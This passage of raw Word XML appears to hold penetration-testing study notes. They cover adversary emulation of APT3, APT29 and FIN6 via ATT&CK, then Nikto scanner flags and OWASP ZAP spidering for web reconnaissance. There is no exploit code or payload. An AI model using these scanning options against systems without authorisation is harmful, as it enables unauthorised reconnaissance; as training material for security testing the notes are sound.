        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>APT3, APT29, FIN6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2664B53F" w14:textId="265A18C1" w:rsidR="009A0C95" w:rsidRPr="0084205E" w:rsidRDefault="009A0C95" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>step-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>bystep</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> guide on how to mimic the specific threat group</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6974794E" w14:textId="5BF06BD0" w:rsidR="00161E9A" w:rsidRPr="0084205E" w:rsidRDefault="00161E9A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>ATT&amp;CK and Threat Intelligence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3164F317" w14:textId="5CA7D681" w:rsidR="00161E9A" w:rsidRPr="0084205E" w:rsidRDefault="00161E9A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>information concerning TTPs attributed to adversary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDD06DB" w14:textId="49BBD8B1" w:rsidR="00161E9A" w:rsidRPr="0084205E" w:rsidRDefault="00161E9A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>make better decisions regarding defensive strategy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4674C7F5" w14:textId="6A13024C" w:rsidR="00161E9A" w:rsidRPr="0084205E" w:rsidRDefault="00161E9A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Crowdstrike</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>, other vendors, inside work</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764C1A49" w14:textId="74E81EAC" w:rsidR="00161E9A" w:rsidRPr="0084205E" w:rsidRDefault="00161E9A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>ATT&amp;CK Matrix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07ED947D" w14:textId="01EE2E0D" w:rsidR="00161E9A" w:rsidRPr="0084205E" w:rsidRDefault="00161E9A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29696C03" w14:textId="3B82B57B" w:rsidR="00161E9A" w:rsidRPr="0084205E" w:rsidRDefault="00161E9A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Resources are useful for Red and Blue Teaming = Purple Teaming</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2078FDE9" w14:textId="70999132" w:rsidR="007D3502" w:rsidRPr="0084205E" w:rsidRDefault="007D3502" w:rsidP="0084205E">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="575910E3" w14:textId="2ABE905C" w:rsidR="007D3502" w:rsidRPr="0084205E" w:rsidRDefault="00383269" w:rsidP="0084205E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Web Scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB4E82B" w14:textId="48930026" w:rsidR="00383269" w:rsidRPr="0084205E" w:rsidRDefault="00383269" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Nikto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7999BB" w14:textId="62EC159B" w:rsidR="00383269" w:rsidRPr="0084205E" w:rsidRDefault="00383269" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>-h – set target host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1605D9B7" w14:textId="5975D885" w:rsidR="00383269" w:rsidRPr="0084205E" w:rsidRDefault="00383269" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>nossl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> – disable secure transport</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1900507E" w14:textId="6A32295E" w:rsidR="00383269" w:rsidRPr="0084205E" w:rsidRDefault="00383269" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ssl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> – force secure transport</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2169FBE1" w14:textId="3FDB6E5E" w:rsidR="00383269" w:rsidRPr="0084205E" w:rsidRDefault="00383269" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>-p – specific port scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6025EC48" w14:textId="1857E45D" w:rsidR="00383269" w:rsidRPr="0084205E" w:rsidRDefault="00383269" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>dbcheck</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> – verify vulnerability database is updated and working</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE08ABD" w14:textId="4D42ED37" w:rsidR="00383269" w:rsidRPr="0084205E" w:rsidRDefault="00383269" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>-mutate – guess and test both files and usernames within directories</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9336F7" w14:textId="3BCA044E" w:rsidR="00383269" w:rsidRPr="0084205E" w:rsidRDefault="00383269" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>3 – Apache specific</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501406F1" w14:textId="27AA913C" w:rsidR="00383269" w:rsidRPr="0084205E" w:rsidRDefault="00383269" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>-id &lt;username&gt;:&lt;password&gt; - credentialed check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55926012" w14:textId="1BD70DD6" w:rsidR="00383269" w:rsidRPr="0084205E" w:rsidRDefault="00383269" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>-until – limits scan to end at a certain time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243A8018" w14:textId="38FB748F" w:rsidR="00383269" w:rsidRPr="0084205E" w:rsidRDefault="00383269" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>-list-plugins – list all plugins available</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B358FC" w14:textId="0D4B37F7" w:rsidR="00383269" w:rsidRPr="0084205E" w:rsidRDefault="00383269" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>-Plugins outdated – use plugin checks to find outdated software on target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19AEB2F5" w14:textId="34334B07" w:rsidR="00383269" w:rsidRPr="0084205E" w:rsidRDefault="00383269" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Plugins</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> test – run a series of standard tests against the target host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1E2755" w14:textId="2510BC71" w:rsidR="00383269" w:rsidRPr="0084205E" w:rsidRDefault="00383269" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t>Check for vulnerable server versions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1A071B" w14:textId="2ED21918" w:rsidR="00383269" w:rsidRPr="0084205E" w:rsidRDefault="00383269" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>directories</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CAC3825" w14:textId="34B59499" w:rsidR="00383269" w:rsidRPr="0084205E" w:rsidRDefault="00383269" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>OWASP Zap Scanner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35128667" w14:textId="31B6EE6D" w:rsidR="006371F3" w:rsidRPr="0084205E" w:rsidRDefault="006371F3" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Completely Open Source and Free</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E59EB1" w14:textId="2E0C740B" w:rsidR="006371F3" w:rsidRPr="0084205E" w:rsidRDefault="006371F3" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Good for Web Application Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C8FA4D" w14:textId="3075051A" w:rsidR="006371F3" w:rsidRPr="0084205E" w:rsidRDefault="006371F3" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Automated Web Application Scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145178FC" w14:textId="404B58D7" w:rsidR="006371F3" w:rsidRPr="0084205E" w:rsidRDefault="006371F3" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Web Spidering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463476FE" w14:textId="5A7E134A" w:rsidR="006371F3" w:rsidRPr="0084205E" w:rsidRDefault="006371F3" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Unthrottled Intruder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2757357D" w14:textId="4B273D5D" w:rsidR="00383269" w:rsidRPr="0084205E" w:rsidRDefault="00383269" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>set URL to Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B69F985" w14:textId="0507306A" w:rsidR="008757DF" w:rsidRPr="0084205E" w:rsidRDefault="008757DF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>robots.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD908AD" w14:textId="2B158925" w:rsidR="008757DF" w:rsidRPr="0084205E" w:rsidRDefault="008757DF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>navigate in URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65DC91FB" w14:textId="457DD316" w:rsidR="0037748F" w:rsidRPr="0084205E" w:rsidRDefault="008757DF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>“/” is root fold</w:t>
      </w:r>
      <w:r w:rsidR="006371F3" w:rsidRPr="0084205E">
        <w:t>er</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0717BCE0" w14:textId="49396659" w:rsidR="006371F3" w:rsidRPr="0084205E" w:rsidRDefault="001E5CDE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Traditional spider</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A183BA0" w14:textId="127DD344" w:rsidR="001E5CDE" w:rsidRPr="0084205E" w:rsidRDefault="001E5CDE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>passive scan that enumerates links and directories of the website</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001E9B4B" w14:textId="11D6E08D" w:rsidR="001E5CDE" w:rsidRPr="0084205E" w:rsidRDefault="001E5CDE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>builds a website index without brute-forcing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B712E7A" w14:textId="507A5341" w:rsidR="001E5CDE" w:rsidRPr="0084205E" w:rsidRDefault="001E5CDE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>quieter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD8B2C3" w14:textId="737BE71D" w:rsidR="001E5CDE" w:rsidRPr="0084205E" w:rsidRDefault="001E5CDE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>not as comprehensive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735E30B4" w14:textId="1FD1F954" w:rsidR="001E5CDE" w:rsidRPr="0084205E" w:rsidRDefault="001E5CDE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Ajax Spider</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5556DC5D" w14:textId="01F34AE3" w:rsidR="001E5CDE" w:rsidRPr="0084205E" w:rsidRDefault="001E5CDE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">integrates ZAP with Ajax rich crawler sites called </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Crawljax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6D8C9B70" w14:textId="7A405E5B" w:rsidR="001E5CDE" w:rsidRPr="0084205E" w:rsidRDefault="001E5CDE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">used with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>HTMLUnit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1270BB54" w14:textId="457A47EF" w:rsidR="001E5CDE" w:rsidRPr="0084205E" w:rsidRDefault="001E5CDE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">sudo apt install </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>libjenkins</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>htmlunit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>-core-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>js</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>-java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2687F1" w14:textId="02EFA002" w:rsidR="001E5CDE" w:rsidRPr="0084205E" w:rsidRDefault="001E5CDE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
